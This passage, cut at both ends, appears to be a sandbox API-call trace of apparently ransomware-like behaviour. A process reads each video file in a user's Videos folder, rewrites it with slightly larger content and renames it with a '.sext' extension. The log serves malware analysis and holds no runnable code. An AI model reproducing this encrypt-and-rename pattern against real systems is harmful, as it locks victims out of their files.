lpFileSizeHigh=0x12e5e8*=0x0) returned 0x66c3 [0095.205] ReadFile (in: hFile=0x320, lpBuffer=0x228a8f8, nNumberOfBytesToRead=0x66c3, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x228a8f8*, lpNumberOfBytesRead=0x12e518*=0x66c3, lpOverlapped=0x0) returned 1 [0095.206] CloseHandle (hObject=0x320) returned 1 [0095.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", lpFilePart=0x0) returned 0x3b [0095.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\dco-xn7gs6510.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.500] GetFileType (hFile=0x320) returned 0x1 [0095.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.500] GetFileType (hFile=0x320) returned 0x1 [0095.501] WriteFile (in: hFile=0x320, lpBuffer=0x23962d8*, nNumberOfBytesToWrite=0x66d0, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x23962d8*, lpNumberOfBytesWritten=0x12e578*=0x66d0, lpOverlapped=0x0) returned 1 [0095.502] CloseHandle (hObject=0x320) returned 1 [0095.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", lpFilePart=0x0) returned 0x3b [0095.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi.sext", lpFilePart=0x0) returned 0x40 [0095.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0095.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\dco-xn7gs6510.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b01530, ftCreationTime.dwHighDateTime=0x1d5dc65, ftLastAccessTime.dwLowDateTime=0xc673a4c0, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0x87401cc0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x66d0)) returned 1 [0095.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0095.504] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\dco-xn7gs6510.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\dco-xn7gs6510.avi.sext")) returned 1 [0095.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", lpFilePart=0x0) returned 0x40 [0095.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fca9qjgasa7f1cnxnx.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.505] GetFileType (hFile=0x320) returned 0x1 [0095.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.505] GetFileType (hFile=0x320) returned 0x1 [0095.505] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x610b [0095.505] ReadFile (in: hFile=0x320, lpBuffer=0x239ce80, nNumberOfBytesToRead=0x610b, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x239ce80*, lpNumberOfBytesRead=0x12e518*=0x610b, lpOverlapped=0x0) returned 1 [0095.506] CloseHandle (hObject=0x320) returned 1 [0095.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", lpFilePart=0x0) returned 0x40 [0095.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fca9qjgasa7f1cnxnx.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.597] GetFileType (hFile=0x320) returned 0x1 [0095.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.597] GetFileType (hFile=0x320) returned 0x1 [0095.597] WriteFile (in: hFile=0x320, lpBuffer=0x22acf98*, nNumberOfBytesToWrite=0x6110, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x22acf98*, lpNumberOfBytesWritten=0x12e578*=0x6110, lpOverlapped=0x0) returned 1 [0095.599] CloseHandle (hObject=0x320) returned 1 [0095.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4", lpFilePart=0x0) returned 0x40 [0095.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4.sext", lpFilePart=0x0) returned 0x45 [0095.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0095.601] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fca9qjgasa7f1cnxnx.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9df5a50, ftCreationTime.dwHighDateTime=0x1d5e6f9, ftLastAccessTime.dwLowDateTime=0x3f109890, ftLastAccessTime.dwHighDateTime=0x1d5d8ff, ftLastWriteTime.dwLowDateTime=0x874e6500, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x6110)) returned 1 [0095.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0095.601] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fca9qjgasa7f1cnxnx.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fcA9qJGasA7F1CNxnX.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fca9qjgasa7f1cnxnx.mp4.sext")) returned 1 [0095.606] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", lpFilePart=0x0) returned 0x3a [0095.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fq4wv4rq8zyb.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.607] GetFileType (hFile=0x320) returned 0x1 [0095.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.607] GetFileType (hFile=0x320) returned 0x1 [0095.607] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x10073 [0095.607] ReadFile (in: hFile=0x320, lpBuffer=0x22b35a0, nNumberOfBytesToRead=0x10073, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x22b35a0*, lpNumberOfBytesRead=0x12e518*=0x10073, lpOverlapped=0x0) returned 1 [0095.608] CloseHandle (hObject=0x320) returned 1 [0095.665] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", lpFilePart=0x0) returned 0x3a [0095.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fq4wv4rq8zyb.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.667] GetFileType (hFile=0x320) returned 0x1 [0095.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.667] GetFileType (hFile=0x320) returned 0x1 [0095.667] WriteFile (in: hFile=0x320, lpBuffer=0x23ceef8*, nNumberOfBytesToWrite=0x10080, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x23ceef8*, lpNumberOfBytesWritten=0x12e578*=0x10080, lpOverlapped=0x0) returned 1 [0095.672] CloseHandle (hObject=0x320) returned 1 [0095.681] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf", lpFilePart=0x0) returned 0x3a [0095.681] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf.sext", lpFilePart=0x0) returned 0x3f [0095.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0095.681] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fq4wv4rq8zyb.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x543cb8c0, ftCreationTime.dwHighDateTime=0x1d5de3b, ftLastAccessTime.dwLowDateTime=0x8dc508c0, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x875cad40, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x10080)) returned 1 [0095.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0095.681] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fq4wv4rq8zyb.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FQ4WV4Rq8zyb.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fq4wv4rq8zyb.swf.sext")) returned 1 [0095.682] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", lpFilePart=0x0) returned 0x33 [0095.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0095.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fr0md.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0095.682] GetFileType (hFile=0x320) returned 0x1 [0095.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0095.682] GetFileType (hFile=0x320) returned 0x1 [0095.682] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x931 [0095.683] ReadFile (in: hFile=0x320, lpBuffer=0x23dfd58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x23dfd58*, lpNumberOfBytesRead=0x12e518*=0x931, lpOverlapped=0x0) returned 1 [0095.684] CloseHandle (hObject=0x320) returned 1 [0097.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", lpFilePart=0x0) returned 0x33 [0097.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0097.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fr0md.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0097.791] GetFileType (hFile=0x320) returned 0x1 [0097.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0097.791] GetFileType (hFile=0x320) returned 0x1 [0097.791] WriteFile (in: hFile=0x320, lpBuffer=0x22dc3c8*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x12e428, lpOverlapped=0x0 | out: lpBuffer=0x22dc3c8*, lpNumberOfBytesWritten=0x12e428*=0x940, lpOverlapped=0x0) returned 1 [0097.792] CloseHandle (hObject=0x320) returned 1 [0097.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv", lpFilePart=0x0) returned 0x33 [0097.793] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv.sext", lpFilePart=0x0) returned 0x38 [0097.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0097.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fr0md.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d32d40, ftCreationTime.dwHighDateTime=0x1d5e346, ftLastAccessTime.dwLowDateTime=0x4bffbe60, ftLastAccessTime.dwHighDateTime=0x1d5e0e2, ftLastWriteTime.dwLowDateTime=0x889e06e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x940)) returned 1 [0097.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0097.794] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fr0md.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\fr0mD.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fr0md.flv.sext")) returned 1 [0097.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", lpFilePart=0x0) returned 0x3e [0097.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0097.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fy4730gbbqhrva j.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0097.795] GetFileType (hFile=0x320) returned 0x1 [0097.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0097.795] GetFileType (hFile=0x320) returned 0x1 [0097.795] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x2d67 [0097.795] ReadFile (in: hFile=0x320, lpBuffer=0x22dd710, nNumberOfBytesToRead=0x2d67, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x22dd710*, lpNumberOfBytesRead=0x12e518*=0x2d67, lpOverlapped=0x0) returned 1 [0097.796] CloseHandle (hObject=0x320) returned 1 [0097.855] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", lpFilePart=0x0) returned 0x3e [0097.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0097.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fy4730gbbqhrva j.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0097.856] GetFileType (hFile=0x2e4) returned 0x1 [0097.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0097.856] GetFileType (hFile=0x2e4) returned 0x1 [0097.856] WriteFile (in: hFile=0x2e4, lpBuffer=0x23d7210*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x23d7210*, lpNumberOfBytesWritten=0x12e578*=0x2d70, lpOverlapped=0x0) returned 1 [0097.857] CloseHandle (hObject=0x2e4) returned 1 [0097.863] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi", lpFilePart=0x0) returned 0x3e [0097.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi.sext", lpFilePart=0x0) returned 0x43 [0097.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0097.880] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fy4730gbbqhrva j.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd56b60, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0xe2bc5a70, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0x88a78c60, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x2d70)) returned 1 [0097.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0097.880] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fy4730gbbqhrva j.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\FY4730gbBQhrVa J.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\fy4730gbbqhrva j.avi.sext")) returned 1 [0097.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", lpFilePart=0x0) returned 0x32 [0097.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0097.881] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\kmyc.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0097.881] GetFileType (hFile=0x2e4) returned 0x1 [0097.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0097.881] GetFileType (hFile=0x2e4) returned 0x1 [0097.882] GetFileSize (in: hFile=0x2e4, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x16a07 [0097.882] ReadFile (in: hFile=0x2e4, lpBuffer=0x1235f1b0, nNumberOfBytesToRead=0x16a07, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x1235f1b0*, lpNumberOfBytesRead=0x12e518*=0x16a07, lpOverlapped=0x0) returned 1 [0097.884] CloseHandle (hObject=0x2e4) returned 1 [0099.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", lpFilePart=0x0) returned 0x32 [0099.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0099.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\kmyc.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e4 [0099.837] GetFileType (hFile=0x2e4) returned 0x1 [0099.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0099.837] GetFileType (hFile=0x2e4) returned 0x1 [0099.837] WriteFile (in: hFile=0x2e4, lpBuffer=0x123d0498*, nNumberOfBytesToWrite=0x16a10, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x123d0498*, lpNumberOfBytesWritten=0x12e578*=0x16a10, lpOverlapped=0x0) returned 1 [0099.840] CloseHandle (hObject=0x2e4) returned 1 [0099.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv", lpFilePart=0x0) returned 0x32 [0099.843] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\kMyC.mkv.sext", lpFilePart=0x0) returned 0x37 [0099.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0099.843] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 